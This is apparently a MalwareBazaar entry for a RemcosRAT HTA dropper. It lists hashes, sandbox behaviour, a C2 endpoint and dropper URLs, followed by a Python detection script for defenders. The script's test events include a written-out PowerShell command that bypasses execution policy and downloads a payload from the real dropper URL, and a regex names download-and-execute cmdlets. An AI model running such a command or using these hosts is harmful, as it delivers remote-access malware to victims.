MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



RemcosRAT


Vendor detections: 10



SHA256 hash: c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6
SHA3-384 hash: 4e5eee0d8a4f8754f3e132c8c9fc15e4a1bed255d1fbaf19da0c16b9a3aa29a0a7e6aca8d43e717e27d9e4c69aa60db1
SHA1 hash: b435d809c0be4a17e966cd381f7b8ed5e7e6bb76
MD5 hash: 6a42c3a78883cd18cae468fda708b16f
humanhash: helium-violet-west-batman
File name: bincnew32.hta
Signature: RemcosRAT
File size: 1'418 bytes
First seen: 2025-08-22 16:57:40 UTC
Last seen: Never
File type: HTML Application (hta)
MIME type: text/html
ssdeep: 24:RMNmMvC4/ptEt5fNZI8Vt1cPsXRXQst5EdjyuMlbs8j35SktKz:4mM5pOt68vh75sjShfno
Threatray: 916 similar samples on MalwareBazaar
TLSH: T1D521667D9564E6DD9AB18A5223FBF51ADF2381870180910437902167FF7131ED9E72CA
Magika: txt
Reporter: abuse_ch
Tags: hta RemcosRAT

Intelligence


File Origin
# of uploads: 1
# of downloads: 48
Origin country: DE
Vendor Threat Intelligence

Verdict: Malicious
Score: 90.2%
Tags: dropper xtreme blic

Result
Verdict: Malicious
File Type: HTA File - Malicious
Behaviour: BlacklistAPI detected
Result
Threat name:
Detection: malicious
Classification: troj.expl.evad
Score: 100 / 100
Signature
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Detected CypherIt Packer
Detected Remcos RAT
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Found malware configuration
Installs new ROOT certificates
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Drops script at startup location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Search for Antivirus process
Sigma detected: Set autostart key via New-ItemProperty Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Yara detected Powershell download and execute
Yara detected Remcos RAT
Behaviour
Behavior Graph ID: 1763148
Sample: bincnew32.hta
Start date: 22/08/2025
Architecture: WINDOWS
Score: 100
Contacted hosts: www.bitsavers.org, ustaxes.net, 10 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures

Process tree (reconstructed from the behavior graph; "..." marks paths truncated in the source; network entries give remote host:port with the local ephemeral port in brackets):
mshta.exe
  network: s-part-0012.t-0009.t-msedge.net 13.107.246.40:443 [49685] (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States)
  signatures: Suspicious powershell command line found; Obfuscated command line found; Tries to download and execute files (via powershell); Bypasses PowerShell execution policy
  powershell.exe
    network: bitsavers.org 208.77.18.144:80 [49681] (TZULOUS, United States); ustaxes.net 65.21.85.206:443 [49682] (CP-ASDE, United States)
    dropped: C:\Users\Public\fire32.exe (PE32); C:\Users\Public\ww.pdf (PDF)
    signatures: Installs new ROOT certificates; Drops PE files to the user root directory; Powershell drops PE file
    fire32.exe
      dropped: C:\Users\user\AppData\Local\...\nsExec.dll (PE32; nsExec.dll is the NSIS nsExec plug-in, consistent with an NSIS-built installer)
      signatures: Multi AV Scanner detection for dropped file
      cmd.exe
        signatures: Detected CypherIt Packer; Drops PE files with a suspicious file extension
        cmd.exe
          dropped: C:\Users\user\AppData\Local\Temp\...\Pipe.pif (PE32)
          Pipe.pif
            network: 37.27.128.29:2404 [49703] (UNINETAZ, Iran (Islamic Republic of)); geoplugin.net 178.237.33.50:80 [49704] (ATOM86-ASATOM86NL, Netherlands)
            dropped: C:\Users\user\AppData\...\SecureSync.bat (PE32)
            signatures: Detected Remcos RAT
            cmd.exe
              dropped: C:\Users\user\AppData\...\SecureSync.url (MS)
              conhost.exe
          tasklist.exe
          findstr.exe
          2 other processes
        conhost.exe
    Acrobat.exe
      AcroCEF.exe
        network: e8652.dscx.akamaiedge.net 23.48.144.248:80 [49688] (AKAMAI-ASN1EU, United States)
        AcroCEF.exe
          network: 23.200.196.138:443 [49696] (NOS_COMUNICACOESPT, United States)
    conhost.exe
SecureSync.bat
  signatures: Detected Remcos RAT
svchost.exe
  network: 127.0.0.1
Verdict: inconclusive
YARA: 4 match(es)
Tags: Html PowerShell

Threat name: Script-WScript.Trojan.Boxter
Status: Malicious
First seen: 2025-08-22 16:47:23 UTC
File Type: Text (HTML)
Extracted files: 1
AV detection: 6 of 38 (15.79%)

Threat level: 5/5

Result
Malware family:
Score: 10/10
Tags: family:remcos botnet:remotehost adware defense_evasion discovery execution rat spyware
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies data under HKEY_USERS
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Windows directory
Enumerates processes with tasklist
Checks computer location settings
Drops startup file
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies trusted root certificate store through registry
Remcos
Remcos family
Suspicious use of NtCreateUserProcessOtherParentProcess
Malware Config
C2 Extraction: 37.27.128.29:2404
Dropper Extraction:
http://www.bitsavers.org/pdf/tti/10136X07-B_QT_UT_Owners_Mar94.pdf
https://ustaxes.net/fire32.pp
Note on the dropper URLs: the behaviour graph shows PowerShell fetching the first URL (bitsavers.org, a public document archive) and writing it to C:\Users\Public\ww.pdf, which is then opened with Acrobat.exe, so that PDF appears to serve as a decoy for the victim. The second URL is the source of the PE written to C:\Users\Public\fire32.exe and is the one to prioritise when blocking or hunting; blocking the archive domain wholesale is likely to cause false positives.
Please note that we are no longer able to provide a coverage score for Virus Total.
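The entry above supplies both atomic indicators (file hashes, the Remcos C2 endpoint, the two dropper URLs, the paths written under C:\Users\Public) and a behaviour chain (mshta.exe spawning powershell.exe with an execution-policy bypass, PowerShell writing a PE to the Public folder, Pipe.pif connecting to 37.27.128.29:2404). The Python script below is an added example, not part of MalwareBazaar or of any vendor tooling shown on this page: it encodes those indicators plus a generic form of the parent/child and file-write rules, and runs them over constructed Sysmon-style events. Only the indicator values are taken from the entry; the event schema, the telemetry lines, and the PowerShell argument spellings in PS_SUSPICIOUS are assumptions (the entry does not show the real command line).

```python
import re

# Indicators copied from this MalwareBazaar entry (hashes, C2, dropper URLs,
# dropped file paths). Everything else in this block is constructed for the example.
SAMPLE_HASHES = {
    "sha256": "c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6",
    "sha1": "b435d809c0be4a17e966cd381f7b8ed5e7e6bb76",
    "md5": "6a42c3a78883cd18cae468fda708b16f",
}
C2_ENDPOINTS = {("37.27.128.29", 2404)}
DROPPER_URLS = {
    "http://www.bitsavers.org/pdf/tti/10136X07-B_QT_UT_Owners_Mar94.pdf",
    "https://ustaxes.net/fire32.pp",
}
DROPPED_PATHS = {r"c:\users\public\fire32.exe", r"c:\users\public\ww.pdf"}

# Command-line traits behind the sandbox's "Bypasses PowerShell execution
# policy" / "download and execute" signatures. The exact argument spellings
# are an assumption; the entry does not show the real command line.
PS_SUSPICIOUS = re.compile(
    r"-e(?:xecutionpolicy|p)\s+bypass"
    r"|-w(?:indowstyle)?\s+hidden"
    r"|-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}"
    r"|\biex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest",
    re.I,
)


def hunt(events):
    """Run the IOC and behaviour rules over a list of event dicts.

    Event schema (constructed for this example, not a real EDR format):
      {"kind": "process", "parent": ..., "image": ..., "cmdline": ...}
      {"kind": "file",    "image": ..., "path": ...}
      {"kind": "net",     "image": ..., "dst_ip": ..., "dst_port": ...}
      {"kind": "hash",    "image": ..., "sha256"/"sha1"/"md5": ...}
    Returns a list of (rule_name, detail) tuples.
    """
    findings = []
    for ev in events:
        kind = ev["kind"]
        image = ev.get("image", "").lower()
        if kind == "process":
            parent = ev.get("parent", "").lower()
            cmd = ev.get("cmdline", "")
            # Parent/child pair from the behaviour graph: mshta.exe -> powershell.exe
            if parent.endswith("mshta.exe") and image.endswith("powershell.exe"):
                findings.append(("mshta_spawns_powershell", cmd))
            if image.endswith("powershell.exe") and PS_SUSPICIOUS.search(cmd):
                findings.append(("suspicious_powershell_cmdline", cmd))
            for url in DROPPER_URLS:
                if url.lower() in cmd.lower():
                    findings.append(("dropper_url_in_cmdline", url))
        elif kind == "file":
            path = ev.get("path", "").lower()
            if path in DROPPED_PATHS:
                findings.append(("known_dropped_file", ev["path"]))
            # Generic form of "Drops PE files to the user root directory":
            # PowerShell writing an executable under C:\Users\Public
            elif (image.endswith("powershell.exe")
                  and path.startswith("c:\\users\\public\\")
                  and path.endswith(".exe")):
                findings.append(("powershell_writes_exe_to_public", ev["path"]))
        elif kind == "net":
            if (ev["dst_ip"], int(ev["dst_port"])) in C2_ENDPOINTS:
                findings.append(("remcos_c2_contact",
                                 f"{image} -> {ev['dst_ip']}:{ev['dst_port']}"))
        elif kind == "hash":
            for algo, value in SAMPLE_HASHES.items():
                if ev.get(algo, "").lower() == value:
                    findings.append(("known_sample_hash", f"{algo}={value}"))
                    break
    return findings


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry: the first five events mirror the chain in the
# behaviour graph; the last two are benign controls that must not alert.
CONSTRUCTED_EVENTS = [
    {"kind": "hash", "image": "bincnew32.hta",
     "sha256": "C83D5BEF9E2AB51C579431AECF23EBB4DC71EEA9D475D46DA89B70DCF4B669A6"},
    {"kind": "process", "parent": r"C:\Windows\System32\mshta.exe", "image": PS_IMAGE,
     "cmdline": 'powershell -ep bypass -w hidden -c "iwr https://ustaxes.net/fire32.pp '
                '-OutFile C:\\Users\\Public\\fire32.exe"'},
    {"kind": "file", "image": PS_IMAGE, "path": r"C:\Users\Public\fire32.exe"},
    {"kind": "file", "image": PS_IMAGE, "path": r"C:\Users\Public\stage2.exe"},
    {"kind": "net", "image": r"C:\Users\user\AppData\Local\Temp\Pipe.pif",
     "dst_ip": "37.27.128.29", "dst_port": 2404},
    {"kind": "process", "parent": r"C:\Windows\explorer.exe", "image": PS_IMAGE,
     "cmdline": "powershell -c Get-Date"},
    {"kind": "net", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dst_ip": "142.250.80.46", "dst_port": 443},
]

if __name__ == "__main__":
    for rule, detail in hunt(CONSTRUCTED_EVENTS):
        print(f"{rule:32} {detail}")
```

The atomic rules (hash, C2 tuple, exact dropper URL, exact dropped path) are high confidence but brittle: a rebuilt dropper or a rotated C2 defeats them. The two behavioural rules (mshta.exe parent of powershell.exe; PowerShell writing an .exe under C:\Users\Public) survive those changes and correspond to the Sigma hits listed above, at the cost of occasional false positives from legitimate HTA-based installers, which is why the script keeps them as separate rule names rather than folding everything into one verdict.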

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These rules are matched against malware samples uploaded to MalwareBazaar and against any suspicious process dumps those samples produce when detonated. Only results from TLP:CLEAR rules are displayed.

Rule name: CP_AllMal_Detector
Author: DiegoAnalytics
Description: CrossPlatform All Malwares Detector: Detect PE, ELF, Mach-O, scripts, archives; overlay, obfuscation, encryption, spoofing, hiding, high entropy, network communication

Rule name: Detect_PowerShell_Obfuscation
Author: daniyyell
Description: Detects obfuscated PowerShell commands commonly used in malicious scripts.

Rule name: Sus_CMD_Powershell_Usage
Author: XiAnzheng
Description: May contain (obfuscated or not) PowerShell or CMD commands that can be abused by a threat actor (can create FPs)

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download (distributed via web download)
Signature: RemcosRAT
File type: HTML Application (hta)
SHA256 hash: c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6 (this sample)
